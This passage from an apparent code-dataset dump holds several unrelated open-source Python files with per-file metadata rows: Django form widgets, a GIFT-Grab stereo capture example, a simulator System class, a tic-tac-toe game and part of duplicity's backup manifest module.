= self.build_attrs(attrs, type=self.input_type, name=name) id_ = final_attrs.get('id', None) inputs = [] for i, v in enumerate(value): input_attrs = dict(value=force_text(v), **final_attrs) if id_: # An ID attribute was given. Add a numeric index as a suffix # so that the inputs don't all have the same ID attribute. 
input_attrs['id'] = '%s_%s' % (id_, i) inputs.append(format_html('<input{0} />', flatatt(input_attrs))) return mark_safe('\n'.join(inputs)) def value_from_datadict(self, data, files, name): if isinstance(data, (MultiValueDict, MergeDict)): return data.getlist(name) return data.get(name, None) class FileInput(Input): input_type = 'file' needs_multipart_form = True def render(self, name, value, attrs=None): return super(FileInput, self).render(name, None, attrs=attrs) def value_from_datadict(self, data, files, name): "File widgets take data from FILES, not POST" return files.get(name, None) FILE_INPUT_CONTRADICTION = object() class ClearableFileInput(FileInput): initial_text = ugettext_lazy('Currently') input_text = ugettext_lazy('Change') clear_checkbox_label = ugettext_lazy('Clear') template_with_initial = '%(initial_text)s: %(initial)s %(clear_template)s<br />%(input_text)s: %(input)s' template_with_clear = '%(clear)s <label for="%(clear_checkbox_id)s">%(clear_checkbox_label)s</label>' url_markup_template = '<a href="{0}">{1}</a>' def clear_checkbox_name(self, name): """ Given the name of the file input, return the name of the clear checkbox input. """ return name + '-clear' def clear_checkbox_id(self, name): """ Given the name of the clear checkbox input, return the HTML id for it. """ return name + '_id' def render(self, name, value, attrs=None): substitutions = { 'initial_text': self.initial_text, 'input_text': self.input_text, 'clear_template': '', 'clear_checkbox_label': self.clear_checkbox_label, } template = '%(input)s' substitutions['input'] = super(ClearableFileInput, self).render(name, value, attrs) if value and hasattr(value, "url"): template = self.template_with_initial substitutions['initial'] = format_html(self.url_markup_template, value.url, force_text(value)) if not self.is_required: checkbox_name = self.clear_checkbox_name(name) checkbox_id = self.clear_checkbox_id(checkbox_name) substitutions['clear_checkbox_name'] = conditional_escape(checkbox_name) substitutions['clear_checkbox_id'] = conditional_escape(checkbox_id) substitutions['clear'] = CheckboxInput().render(checkbox_name, False, attrs={'id': checkbox_id}) substitutions['clear_template'] = self.template_with_clear % substitutions return mark_safe(template % substitutions) def value_from_datadict(self, data, files, name): upload = super(ClearableFileInput, self).value_from_datadict(data, files, name) if not self.is_required and CheckboxInput().value_from_datadict( data, files, self.clear_checkbox_name(name)): if upload: # If the user contradicts themselves (uploads a new file AND # checks the "clear" checkbox), we return a unique marker # object that FileField will turn into a ValidationError. return FILE_INPUT_CONTRADICTION # False signals to clear any existing value, as opposed to just None return False return upload class Textarea(Widget): def __init__(self, attrs=None): # The 'rows' and 'cols' attributes are required for HTML correctness. 
default_attrs = {'cols': '40', 'rows': '10'} if attrs: default_attrs.update(attrs) super(Textarea, self).__init__(default_attrs) def render(self, name, value, attrs=None): if value is None: value = '' final_attrs = self.build_attrs(attrs, name=name) return format_html('<textarea{0}>\r\n{1}</textarea>', flatatt(final_attrs), force_text(value)) class DateInput(TextInput): def __init__(self, attrs=None, format=None): super(DateInput, self).__init__(attrs) if format: self.format = format self.manual_format = True else: self.format = formats.get_format('DATE_INPUT_FORMATS')[0] self.manual_format = False def _format_value(self, value): if self.is_localized and not self.manual_format: return formats.localize_input(value) elif hasattr(value, 'strftime'): value = datetime_safe.new_date(value) return value.strftime(self.format) return value class DateTimeInput(TextInput): def __init__(self, attrs=None, format=None): super(DateTimeInput, self).__init__(attrs) if format: self.format = format self.manual_format = True else: self.format = formats.get_format('DATETIME_INPUT_FORMATS')[0] self.manual_format = False def _format_value(self, value): if self.is_localized and not self.manual_format: return formats.localize_input(value) elif hasattr(value, 'strftime'): value = datetime_safe.new_datetime(value) return value.strftime(self.format) return value class TimeInput(TextInput): def __init__(self, attrs=None, format=None): super(TimeInput, self).__init__(attrs) if format: self.format = format self.manual_format = True else: self.format = formats.get_format('TIME_INPUT_FORMATS')[0] self.manual_format = False def _format_value(self, value): if self.is_localized and not self.manual_format: return formats.localize_input(value) elif hasattr(value, 'strftime'): return value.strftime(self.format) return value # Defined at module level so that CheckboxInput is picklable (#17976) def boolean_check(v): return not (v is False or v is None or v == '') class CheckboxInput(Widget): def __init__(self, attrs=None, check_test=None): super(CheckboxInput, self).__init__(attrs) # check_test is a callable that takes a value and returns True # if the checkbox should be checked for that value. self.check_test = boolean_check if check_test is None else check_test def render(self, name, value, attrs=None): final_attrs = self.build_attrs(attrs, type='checkbox', name=name) if self.check_test(value): final_attrs['checked'] = 'checked' if not (value is True or value is False or value is None or value == ''): # Only add the 'value' attribute if a value is non-empty. final_attrs['value'] = force_text(value) return format_html('<input{0} />', flatatt(final_attrs)) def value_from_datadict(self, data, files, name): if name not in data: # A missing value means False because HTML form submission does not # send results for unselected checkboxes. return False value = data.get(name) # Translate true and false strings to boolean values. values = {'true': True, 'false': False} if isinstance(value, six.string_types): value = values.get(value.lower(), value) return bool(value) class Select(Widget): allow_multiple_selected = False def __init__(self, attrs=None, choices=()): super(Select, self).__init__(attrs) # choices can be any iterable, but we may need to render this widget # multiple times. Thus, collapse it into a list so it can be consumed # more than once. 
self.choices = list(choices) def render(self, name, value, attrs=None, choices=()): if value is None: value = '' final_attrs = self.build_attrs(attrs, name=name) output = [format_html('<select{0}>', flatatt(final_attrs))] options = self.render_options(choices, [value]) if options: output.append(options) output.append('</select>') return mark_safe('\n'.join(output)) def render_option(self, selected_choices, option_value, option_label): if option_value == None: option_value = '' option_value = force_text(option_value) if option_value in selected_choices: selected_html = mark_safe(' selected="selected"') if not self.allow_multiple_selected: # Only allow for a single selection. selected_choices.remove(option_value) else: selected_html = '' return format_html('<option value="{0}"{1}>{2}</option>', option_value, selected_html, force_text(option_label)) def render_options(self, choices, selected_choices): # Normalize to strings. selected_choices = set(force_text(v) for v in selected_choices) output = [] for option_value, option_label in chain(self.choices, choices): if isinstance(option_label, (list, tuple)): output.append(format_html('<optgroup label="{0}">', force_text(option_value))) for option in option_label: output.append(self.render_option(selected_choices, *option)) output.append('</optgroup>') else: output.append(self.render_option(selected_choices, option_value, option_label)) return '\n'.join(output) class NullBooleanSelect(Select): """ A Select Widget intended to be used with NullBooleanField. """ def __init__(self, attrs=None): choices = (('1', ugettext_lazy('Unknown')), ('2', ugettext_lazy('Yes')), ('3', ugettext_lazy('No'))) super(NullBooleanSelect, self).__init__(attrs, choices) def render(self, name, value, attrs=None, choices=()): try: value = {True: '2', False: '3', '2': '2', '3': '3'}[value] except KeyError: value = '1' return super(NullBooleanSelect, self).render(name, value, attrs, choices) def value_from_datadict(self, data, files, name): value = data.get(name, None) return {'2': True, True: True, 'True': True, '3': False, 'False': False, False: False}.get(value, None) class SelectMultiple(Select): allow_multiple_selected = True def render(self, name, value, attrs=None, choices=()): if value is None: value = [] final_attrs = self.build_attrs(attrs, name=name) output = [format_html('<select multiple="multiple"{0}>', flatatt(final_attrs))] options = self.render_options(choices, value) if options: output.append(options) output.append('</select>') return mark_safe('\n'.join(output)) def value_from_datadict(self, data, files, name): if isinstance(data, (MultiValueDict, MergeDict)): return data.getlist(name) return data.get(name, None) @python_2_unicode_compatible class ChoiceInput(SubWidget): """ An object used by ChoiceFieldRenderer that represents a single <input type='$input_type'>. 
""" input_type = None # Subclasses must define this def __init__(self, name, value, attrs, choice, index): self.name = name self.value = value self.attrs = attrs self.choice_value = force_text(choice[0]) self.choice_label = force_text(choice[1]) self.index = index if 'id' in self.attrs: self.attrs['id'] += "_%d" % self.index def __str__(self): return self.render() def render(self, name=None, value=None, attrs=None, choices=()): if self.id_for_label: label_for = format_html(' for="{0}"', self.id_for_label) else: label_for = '' return format_html('<label{0}>{1} {2}</label>', label_for, self.tag(), self.choice_label) def is_checked(self): return self.value == self.choice_value def tag(self): final_attrs = dict(self.attrs, type=self.input_type, name=self.name, value=self.choice_value) if self.is_checked(): final_attrs['checked'] = 'checked' return format_html('<input{0} />', flatatt(final_attrs)) @property def id_for_label(self): return self.attrs.get('id', '') class RadioChoiceInput(ChoiceInput): input_type = 'radio' def __init__(self, *args, **kwargs): super(RadioChoiceInput, self).__init__(*args, **kwargs) self.value = force_text(self.value) class RadioInput(RadioChoiceInput): def __init__(self, *args, **kwargs): msg = "RadioInput has been deprecated. Use RadioChoiceInput instead." warnings.warn(msg, DeprecationWarning, stacklevel=2) super(RadioInput, self).__init__(*args, **kwargs) class CheckboxChoiceInput(ChoiceInput): input_type = 'checkbox' def __init__(self, *args, **kwargs): super(CheckboxChoiceInput, self).__init__(*args, **kwargs) self.value = set(force_text(v) for v in self.value) def is_checked(self): return self.choice_value in self.value @python_2_unicode_compatible class ChoiceFieldRenderer(object): """ An object used by RadioSelect to enable customization of radio widgets. """ choice_input_class = None def __init__(self, name, value, attrs, choices): self.name = name self.value = value self.attrs = attrs self.choices = choices def __getitem__(self, idx): choice = self.choices[idx] # Let the IndexError propogate return self.choice_input_class(self.name, self.value, self.attrs.copy(), choice, idx) def __str__(self): return self.render() def render(self): """ Outputs a <ul> for this set of choice fields. If an id was given to the field, it is applied to the <ul> (each item in the list will get an id of `$id_$i`). """ id_ = self.attrs.get('id', None) start_tag = format_html('<ul id="{0}">', id_) if id_ else '<ul>' output = [start_tag] for i, choice in enumerate(self.choices): choice_value, choice_label = choice if isinstance(choice_label, (tuple,list)): attrs_plus = self.attrs.copy() if id_: attrs_plus['id'] += '_{0}'.format(i) sub_ul_renderer = ChoiceFieldRenderer(name=self.name, value=self.value, attrs=attrs_plus, choices=choice_label) sub_ul_renderer.choice_input_class = self.choice_input_class output.append(format_html('<li>{0}{1}</li>', choice_value, sub_ul_renderer.render())) else: w = self.choice_input_class(self.name, self.value, self.attrs.copy(), choice, i) output.append(format_html('<li>{0}</li>', force_text(w))) output.append('</ul>') return mark_safe('\n'.join(output)) class RadioFieldRenderer(ChoiceFieldRenderer): choice_input_class = RadioChoiceInput class CheckboxFieldRenderer(ChoiceFieldRenderer): choice_input_class = CheckboxChoiceInput class RendererMixin(object): renderer = None # subclasses must define this _empty_value = None def __init__(self, *args, **kwargs): # Override the default renderer if we were passed one. 
renderer = kwargs.pop('renderer', None) if renderer: self.renderer = renderer super(RendererMixin, self).__init__(*args, **kwargs) def subwidgets(self, name, value, attrs=None, choices=()): for widget in self.get_renderer(name, value, attrs, choices): yield widget def get_renderer(self, name, value, attrs=None, choices=()): """Returns an instance of the renderer.""" if value is None: value = self._empty_value final_attrs = self.build_attrs(attrs) choices = list(chain(self.choices, choices)) return self.renderer(name, value, final_attrs, choices) def render(self, name, value, attrs=None, choices=()): return self.get_renderer(name, value, attrs, choices).render() def id_for_label(self, id_): # Widgets using this RendererMixin are made of a collection of # subwidgets, each with their own <label>, and distinct ID. # The IDs are made distinct by y "_X" suffix, where X is the zero-based # index of the choice field. Thus, the label for the main widget should # reference the first subwidget, hence the "_0" suffix. if id_: id_ += '_0' return id_ class RadioSelect(RendererMixin, Select): renderer = RadioFieldRenderer _empty_value = '' class CheckboxSelectMultiple(RendererMixin, SelectMultiple): renderer = CheckboxFieldRenderer _empty_value = [] class MultiWidget(Widget): """ A widget that is composed of multiple widgets. Its render() method is different than other widgets', because it has to figure out how to split a single value for display in multiple widgets. The ``value`` argument can be one of two things: * A list. * A normal value (e.g., a string) that has been "compressed" from a list of values. In the second case -- i.e., if the value is NOT a list -- render() will first "decompress" the value into a list before rendering it. It does so by calling the decompress() method, which MultiWidget subclasses must implement. This method takes a single "compressed" value and returns a list. When render() does its HTML rendering, each value in the list is rendered with the corresponding widget -- the first value is rendered in the first widget, the second value is rendered in the second widget, etc. Subclasses may implement format_output(), which takes the list of rendered widgets and returns a string of HTML that formats them any way you'd like. You'll probably want to use this class with MultiValueField. """ def __init__(self, widgets, attrs=None): self.widgets = [w() if isinstance(w, type) else w for w in widgets] super(MultiWidget, self).__init__(attrs) def render(self, name, value, attrs=None): if self.is_localized: for widget in self.widgets: widget.is_localized = self.is_localized # value is a list of values, each corresponding to a widget # in self.widgets. 
if not isinstance(value, list): value = self.decompress(value) output = [] final_attrs = self.build_attrs(attrs) id_ = final_attrs.get('id', None) for i, widget in enumerate(self.widgets): try: widget_value = value[i] except IndexError: widget_value = None if id_: final_attrs = dict(final_attrs, id='%s_%s' % (id_, i)) output.append(widget.render(name + '_%s' % i, widget_value, final_attrs)) return mark_safe(self.format_output(output)) def id_for_label(self, id_): # See the comment for RadioSelect.id_for_label() if id_: id_ += '_0' return id_ def value_from_datadict(self, data, files, name): return [widget.value_from_datadict(data, files, name + '_%s' % i) for i, widget in enumerate(self.widgets)] def format_output(self, rendered_widgets): """ Given a list of rendered widgets (as strings), returns a Unicode string representing the HTML for the whole lot. This hook allows you to format the HTML design of the widgets, if needed. """ return ''.join(rendered_widgets) def decompress(self, value): """ Returns a list of decompressed values for the given compressed value. The given value can be assumed to be valid, but not necessarily non-empty. """ raise NotImplementedError('Subclasses must implement this method.') def _get_media(self): "Media for a multiwidget is the combination of all media of the subwidgets" media = Media() for w in self.widgets: media = media + w.media return media media = property(_get_media) def __deepcopy__(self, memo): obj = super(MultiWidget, self).__deepcopy__(memo) obj.widgets = copy.deepcopy(self.widgets) return obj @property def needs_multipart_form(self): return any(w.needs_multipart_form for w in self.widgets) class SplitDateTimeWidget(MultiWidget): """ A Widget that splits datetime input into two <input type="text"> boxes. """ def __init__(self, attrs=None, date_format=None, time_format=None): widgets = (DateInput(attrs=attrs, format=date_format), TimeInput(attrs=attrs, format=time_format)) super(SplitDateTimeWidget, self).__init__(widgets, attrs) def decompress(self, value): if value: value = to_current_timezone(value) return [value.date(), value.time().replace(microsecond=0)] return [None, None] class SplitHiddenDateTimeWidget(SplitDateTimeWidget): """ A Widget that splits datetime input into two <input type="hidden"> inputs. """ is_hidden = True def __init__(self, attrs=None, date_format=None, time_format=None): super(SplitHiddenDateTimeWidget, self).__init__(attrs, date_format, time_format) for widget in self.widgets: widget.input_type = 'hidden' widget.is_hidden = True
bsd-3-clause
-8,474,089,965,727,551,000
35.813137
130
0.596628
false
4.139837
false
false
false
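The MultiWidget docstring in the widgets module above explains that subclasses must implement decompress() to split a single "compressed" value across sub-widgets; a minimal sketch of such a subclass (a hypothetical RangeWidget, assuming the same Django 1.6-era API as the source above) could look like this:

from django.forms.widgets import MultiWidget, TextInput

class RangeWidget(MultiWidget):
    """Hypothetical widget that splits a "low-high" string into two text inputs."""

    def __init__(self, attrs=None):
        widgets = (TextInput(attrs=attrs), TextInput(attrs=attrs))
        super(RangeWidget, self).__init__(widgets, attrs)

    def decompress(self, value):
        # A single compressed value such as "1-10" becomes one entry per
        # sub-widget; None renders both sub-widgets empty.
        if value:
            low, _, high = value.partition("-")
            return [low, high]
        return [None, None]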
gift-surg/GIFT-Grab
src/tests/blackmagic/stereo_capture.py
1
4325
#!/usr/bin/env python2 # -*- coding: utf-8 -*- """ Example demonstrating how stereo video frames can be captured using a frame grabber card that supports this feature. """ import time import cv2 import numpy as np from pygiftgrab import (IObserver, VideoSourceFactory, ColourSpace, Device, VideoFrame) class StereoFrameSaver(IObserver): """ Simple class that demonstrates how mono and stereo frames, and their respective parameters can be queried and the actual frame data can be saved using the GIFT-Grab stereo API. """ def __init__(self): super(StereoFrameSaver, self).__init__() self.current = 0 def update(self, frame): self.current += 1 # 4 is the number of variations of stereo/mono # calls to the data method, using it here as well to # avoid flooding the user's terminal if self.current <= 4: # display number of stereo frames, should be 2 # for this device print( 'Got {} stereo frames'.format( frame.stereo_count() ) ) # display length of data of each stereo frame, # each stereo frame should consist of same number # of bytes for this device print( 'Stereo data length (bytes):\n' '\tdata_length(): {}\n' '\tdata_length(0): {}\n' '\tdata_length(1): {}\n'.format( frame.data_length(), frame.data_length(0), frame.data_length(1) ) ) frame_shape = (frame.rows(), frame.cols(), 4) # the slicing below, i.e. [:, :, :3], is due to OpenCV's # imwrite expecting BGR data, so we strip out the alpha # channel of each frame when saving it if self.current == 1: # all three calls below save the same frame, # that is the first of the two stereo frames cv2.imwrite( 'mono-frame.data.png', np.reshape(frame.data(), frame_shape)[:, :, :3] ) cv2.imwrite( 'mono-frame.data-False.png', np.reshape(frame.data(False), frame_shape)[:, :, :3] ) cv2.imwrite( 'mono-frame.data-False-0.png', np.reshape(frame.data(False, 0), frame_shape)[:, :, :3] ) elif self.current == 2: # the two calls below save the two stereo frames, # however the data needs to be reshaped, as the # call to the data method yields a flat NumPy array cv2.imwrite( 'stereo-frame.data-False-0.png', np.reshape(frame.data(False, 0), frame_shape)[:, :, :3] ) cv2.imwrite( 'stereo-frame.data-False-1.png', np.reshape(frame.data(False, 1), frame_shape)[:, :, :3] ) elif self.current == 3: # the two calls below save the two stereo frames, # without the need for reshaping the data, as the # call to the data method already yields a # structured NumPy array cv2.imwrite( 'mono-frame.data-True.png', frame.data(True)[:, :, :3] ) cv2.imwrite( 'mono-frame.data-True-0.png', frame.data(True, 0)[:, :, :3] ) elif self.current == 4: # the two calls below save the two stereo frames, # without the need for reshaping the data, as the # call to the data method already yields a # structured NumPy array cv2.imwrite( 'stereo-frame.data-True-0.png', frame.data(True, 0)[:, :, :3] ) cv2.imwrite( 'stereo-frame.data-True-1.png', frame.data(True, 1)[:, :, :3] ) if __name__ == '__main__': sfac = VideoSourceFactory.get_instance() source = sfac.get_device( Device.DeckLink4KExtreme12G, ColourSpace.BGRA ) saver = StereoFrameSaver() source.attach(saver) time.sleep(2) # operate pipeline for 2 sec source.detach(saver)
bsd-3-clause
-5,324,610,510,568,604,000
32.269231
71
0.52
false
4.080189
false
false
false
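The update() callback in the stereo capture example above repeatedly reshapes the flat frame buffer before saving it; the reshaping step on its own is plain NumPy and can be sketched without GIFT-Grab (the 2x2 buffer below is made up for illustration):

import numpy as np

rows, cols = 2, 2
flat = np.arange(rows * cols * 4, dtype=np.uint8)  # stand-in for frame.data()

# Reshape the flat BGRA buffer to (rows, cols, 4) and drop the alpha channel,
# mirroring the [:, :, :3] slicing used before each cv2.imwrite call above.
bgr = np.reshape(flat, (rows, cols, 4))[:, :, :3]
print(bgr.shape)  # (2, 2, 3)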
arcade-lab/tia-infrastructure
tools/simulator/system.py
1
9352
""" Top-level system wrapper. """ import re import sys import pandas as pd from simulator.exception import SimulatorException class System: """ A system class to wrap a collection of processing and memory elements as well as the channels through which they communicate. """ def __init__(self): """ Empty system. """ # Start at the zeroth cycle, and initialize system elements as empty lists to allow for appends. self.cycle = 0 self.processing_elements = [] self.memories = [] self.buffers = [] # Add hierarchical elements for easier access. self.quartets = [] self.blocks = [] self.arrays = [] # --- Time-stepping Method --- def iterate(self, interactive, show_processing_elements, show_memories, show_buffers, keep_execution_trace): """ Move ahead one clock cycle, period or whatever you want to call it (this is a functional simulator). :param interactive: waiting on the user at each cycle :param show_processing_elements: showing processing element information :param show_memories: showing memory element information :param show_buffers: showing channel information :return: whether the system has halted """ # Initially, assume the system is halting this cycle. halt = True # Print out a debug header, if requested. if interactive or show_processing_elements or show_memories or show_buffers: print(f"\n--- Cycle: {self.cycle} ---\n") # Perform local processing element operations. if show_processing_elements: print("Processing Elements\n") for processing_element in self.processing_elements: processing_element.iterate(show_processing_elements, keep_execution_trace) for processing_element in self.processing_elements: halt &= processing_element.core.halt_register # Only halt if all processing elements have halted. # Perform memory operations. if show_memories: print("Memories\n") for memory in self.memories: memory.iterate(show_memories) # Commit all pending buffer transactions. if show_buffers: print("Buffers\n") for buffer in self.buffers: buffer.commit(show_buffers) halt &= buffer.empty # Only halt the system if all buffers are empty. # Move time forward assuming we are not halting. if not halt: self.cycle += 1 # Return whether we should halt. return halt # --- Display Methods --- def halt_message(self): """ Print a message showing the state of the system upon halting. """ # Formatted message. print(f"\n--- System halted after {self.cycle} cycles. ---\n") print("Final Memory Layout\n") for memory in self.memories: print(f"name: {memory.name}") print("contents:") i = 0 while i < 10: if i < len(memory.contents): print(f"0x{memory.contents[i]:08x}") else: break i += 1 if len(memory.contents) > 10: print("...\n") else: print("bound\n") def interrupted_message(self): """ Print a message showing the state of the system upon being interrupted by the user in a simulation. :param self: system wrapper """ # Formatted message. print(f"\n--- System interrupted after {self.cycle} cycles. ---\n") print("Final Memory Layout\n") for memory in self.memories: print(f"name: {memory.name}") print("contents:") i = 0 while i < 10: if i < len(memory.contents): print(f"0x{memory.contents[i]:08x}") else: break i += 1 if len(memory.contents) > 10: print("...\n") else: print("bound\n") # --- Top-level Methods --- def register(self, element): """ Register a functional unit (processing element, memory, etc.) with the event loop. :param element: functional unit """ # Make sure the functional unit has a special registration method. 
registration_operation = getattr(element, "_register") if not callable(registration_operation): exception_string = f"The functional unit of type {type(element)} does not have internal system " \ + f"registration method." raise SimulatorException(exception_string) # Call the functional unit's internal method. element._register(self) def finalize(self): """ Alphabetize components in the event loop for clean debug output and make sure all processing elements are indexed. """ # The numerical strings are the ones we care about. def natural_number_sort_key(entity): name = entity.name key_string_list = re.findall(r"(\d+)", name) if len(key_string_list) > 0: return [int(key_string) for key_string in key_string_list] else: return [] # Sort all the entities. self.processing_elements = sorted(self.processing_elements, key=natural_number_sort_key) for i, processing_element in enumerate(self.processing_elements): if processing_element.name != f"processing_element_{i}": exception_string = f"Missing processing element {i}." raise SimulatorException(exception_string) self.memories = sorted(self.memories, key=natural_number_sort_key) self.buffers = sorted(self.buffers, key=natural_number_sort_key) def run(self, interactive, show_processing_elements, show_memories, show_buffers, keep_execution_trace): """ Execute until the system halts or a user issues an interrupt or writes an EOF. :param interactive: whether to wait for user input on each cycle :param show_processing_elements: whether to show processing element status each cycle :param show_memories: whether to show a summary of the memory contents each cycle :param show_buffers: whether to show channel state each cycle :param keep_execution_trace: whether to keep a running log of executed instructions on each processing element :return: whether the system has halted and whether it was interrupted """ # Simple event/read-evaluate loop. halt = False interrupted = False while True: try: if interactive: if self.cycle > 0: user_input = input("Press [Enter] to continue. Type \"exit\", or use [Ctrl-C] o [Ctrl-D] to " + "exit.\n").strip() if user_input == "exit": break elif user_input != "": print(f"Unrecognized command: {user_input}.", file=sys.stderr) halt = self.iterate(interactive, show_processing_elements, show_memories, show_buffers, keep_execution_trace) if halt: self.halt_message() break except (KeyboardInterrupt, EOFError): interrupted = True self.interrupted_message() break # Return the status flags. return halt, interrupted def reset_processing_elements(self): """ Reset all the processing elements in a system. """ # Use the reset() methods built in to the processing elements. for processing_element in self.processing_elements: processing_element.reset() def reset_memories(self): """ Reset all the memories in a system. """ # Use the reset() methods built in to the memories. for memory in self.memories: memory.reset() def reset_buffers(self): """ Reset all the buffers in a system. """ # Use the buffers' own reset() methods. for buffer in self.buffers: buffer.reset() def reset(self): """ Reset all the processing elements, memories and buffers. """ # Just wrap our own methods. self.reset_processing_elements() self.reset_memories() self.reset_buffers() @property def processing_element_traces(self): # Return a dictionary of execution traces. 
return {processing_element.name: processing_element.core.execution_trace for processing_element in self.processing_elements} @property def processing_element_traces_as_data_frame(self): # For convenient CSV output and analysis. return pd.DataFrame(self.processing_element_traces)
mit
3,835,425,596,161,252,000
34.558935
118
0.572391
false
4.752033
false
false
false
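System.register() in the simulator above only requires that an element expose a callable _register(system) hook plus the iterate/reset methods the event loop calls; a minimal sketch of a compatible element (the DummyMemory class is invented here and is not part of the simulator package):

class DummyMemory:
    """Hypothetical element showing the hooks System.register() and iterate() expect."""

    def __init__(self, name):
        self.name = name
        self.contents = []

    def _register(self, system):
        # Add ourselves to the list the event loop walks each cycle.
        system.memories.append(self)

    def iterate(self, show_memories):
        pass  # nothing to do in this sketch

    def reset(self):
        self.contents = []

# Usage sketch: system = System(); system.register(DummyMemory("memory_0")); system.finalize()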
Mariaanisimova/pythonintask
IVTp/2014/Shcherbakov_R_A/task_12_22.py
1
1719
# Задача 12. Вариант 22. # Разработайте игру "Крестики-нолики". (см. М.Доусон Программируем на Python # гл. 6). # Щербаков Р.А. # 22.05.2016 print(""" Добро пожаловать на игру крестики нолики чтобы сделать ход введите число от 0 до 8 0 | 1 | 2 --------- 3 | 4 | 5 --------- 6 | 7 | 8""") doska=["-","-","-","-","-","-","-","-","-"] bol=True wins=False schet=0 def disp(doska): print("\n\t"+doska[0]+" | "+doska[1]+" | "+doska[2]+"\n\t---------"+ "\n\t"+doska[3]+" | "+doska[4]+" | "+doska[5]+"\n\t---------"+ "\n\t"+doska[6]+" | "+doska[7]+" | "+doska[8]+"\n\t---------") def win(doska): twin=((0,1,2),(3,4,5),(6,7,8),(0,3,6),(1,4,7),(2,5,8),(0,4,8),(2,4,6)) for row in twin: if doska[row[0]]==doska[row[1]]==doska[row[2]]!="-": return True while wins!=True: if(schet==5): break if(bol): n1=input("\nХод игрока 1: ") if(doska[int(n1)]=="-"): doska[int(n1)]="X" disp(doska) bol=False wins=win(doska) schet+=1 else: print("Занято") else: n2=input("\nХод игрока 2: ") if(doska[int(n2)]=="-"): doska[int(n2)]="O" disp(doska) bol=True wins=win(doska) else: print("Занято") if(wins and bol): print("Победил игрок 2") elif(wins and not bol): print("Победил игрок 1") else: print("Ничья") input("Ok")
apache-2.0
7,851,925,064,230,096,000
25.137931
76
0.446205
false
2.092541
false
false
false
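The win() helper in the tic-tac-toe exercise above checks the eight winning lines by board index; the same check can be exercised on its own, for example:

WIN_LINES = ((0, 1, 2), (3, 4, 5), (6, 7, 8),
             (0, 3, 6), (1, 4, 7), (2, 5, 8),
             (0, 4, 8), (2, 4, 6))

def has_winner(board):
    # True when any line holds three identical non-empty marks.
    return any(board[a] == board[b] == board[c] != "-" for a, b, c in WIN_LINES)

print(has_winner(["X", "X", "X", "-", "-", "-", "-", "-", "-"]))  # True
print(has_winner(["X", "O", "X", "-", "-", "-", "-", "-", "-"]))  # False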
muff1nman/duplicity
duplicity/manifest.py
1
16791
# -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*- # # Copyright 2002 Ben Escoto <ben@emerose.org> # Copyright 2007 Kenneth Loafman <kenneth@loafman.com> # # This file is part of duplicity. # # Duplicity is free software; you can redistribute it and/or modify it # under the terms of the GNU General Public License as published by the # Free Software Foundation; either version 2 of the License, or (at your # option) any later version. # # Duplicity is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. # # You should have received a copy of the GNU General Public License # along with duplicity; if not, write to the Free Software Foundation, # Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA """Create and edit manifest for session contents""" from future_builtins import filter import re from duplicity import log from duplicity import globals from duplicity import util class ManifestError(Exception): """ Exception raised when problem with manifest """ pass class Manifest: """ List of volumes and information about each one """ def __init__(self, fh=None): """ Create blank Manifest @param fh: fileobj for manifest @type fh: DupPath @rtype: Manifest @return: manifest """ self.hostname = None self.local_dirname = None self.volume_info_dict = {} # dictionary vol numbers -> vol infos self.fh = fh self.files_changed = [] def set_dirinfo(self): """ Set information about directory from globals, and write to manifest file. @rtype: Manifest @return: manifest """ self.hostname = globals.hostname self.local_dirname = globals.local_path.name # @UndefinedVariable if self.fh: if self.hostname: self.fh.write("Hostname %s\n" % self.hostname) if self.local_dirname: self.fh.write("Localdir %s\n" % Quote(self.local_dirname)) return self def check_dirinfo(self): """ Return None if dirinfo is the same, otherwise error message Does not raise an error message if hostname or local_dirname are not available. @rtype: string @return: None or error message """ if globals.allow_source_mismatch: return if self.hostname and self.hostname != globals.hostname: errmsg = _("Fatal Error: Backup source host has changed.\n" "Current hostname: %s\n" "Previous hostname: %s") % (globals.hostname, self.hostname) code = log.ErrorCode.hostname_mismatch code_extra = "%s %s" % (util.escape(globals.hostname), util.escape(self.hostname)) elif (self.local_dirname and self.local_dirname != globals.local_path.name): # @UndefinedVariable errmsg = _("Fatal Error: Backup source directory has changed.\n" "Current directory: %s\n" "Previous directory: %s") % (globals.local_path.name, self.local_dirname) # @UndefinedVariable code = log.ErrorCode.source_dir_mismatch code_extra = "%s %s" % (util.escape(globals.local_path.name), util.escape(self.local_dirname)) # @UndefinedVariable else: return log.FatalError(errmsg + "\n\n" + _("Aborting because you may have accidentally tried to " "backup two different data sets to the same remote " "location, or using the same archive directory. 
If " "this is not a mistake, use the " "--allow-source-mismatch switch to avoid seeing this " "message"), code, code_extra) def set_files_changed_info(self, files_changed): if files_changed: self.files_changed = files_changed if self.fh: self.fh.write("Filelist %d\n" % len(self.files_changed)) for fileinfo in self.files_changed: self.fh.write(" %-7s %s\n" % (fileinfo[1], Quote(fileinfo[0]))) def add_volume_info(self, vi): """ Add volume info vi to manifest and write to manifest @param vi: volume info to add @type vi: VolumeInfo @return: void """ vol_num = vi.volume_number self.volume_info_dict[vol_num] = vi if self.fh: self.fh.write(vi.to_string() + "\n") def del_volume_info(self, vol_num): """ Remove volume vol_num from the manifest @param vol_num: volume number to delete @type vi: int @return: void """ try: del self.volume_info_dict[vol_num] except Exception: raise ManifestError("Volume %d not present in manifest" % (vol_num,)) def to_string(self): """ Return string version of self (just concatenate vi strings) @rtype: string @return: self in string form """ result = "" if self.hostname: result += "Hostname %s\n" % self.hostname if self.local_dirname: result += "Localdir %s\n" % Quote(self.local_dirname) result += "Filelist %d\n" % len(self.files_changed) for fileinfo in self.files_changed: result += " %-7s %s\n" % (fileinfo[1], Quote(fileinfo[0])) vol_num_list = self.volume_info_dict.keys() vol_num_list.sort() def vol_num_to_string(vol_num): return self.volume_info_dict[vol_num].to_string() result = "%s%s\n" % (result, "\n".join(map(vol_num_to_string, vol_num_list))) return result __str__ = to_string def from_string(self, s): """ Initialize self from string s, return self """ def get_field(fieldname): """ Return the value of a field by parsing s, or None if no field """ m = re.search("(^|\\n)%s\\s(.*?)\n" % fieldname, s, re.I) if not m: return None else: return Unquote(m.group(2)) self.hostname = get_field("hostname") self.local_dirname = get_field("localdir") # Get file changed list filelist_regexp = re.compile("(^|\\n)filelist\\s([0-9]+)\\n(.*?)(\\nvolume\\s|$)", re.I | re.S) match = filelist_regexp.search(s) filecount = 0 if match: filecount = int(match.group(2)) if filecount > 0: def 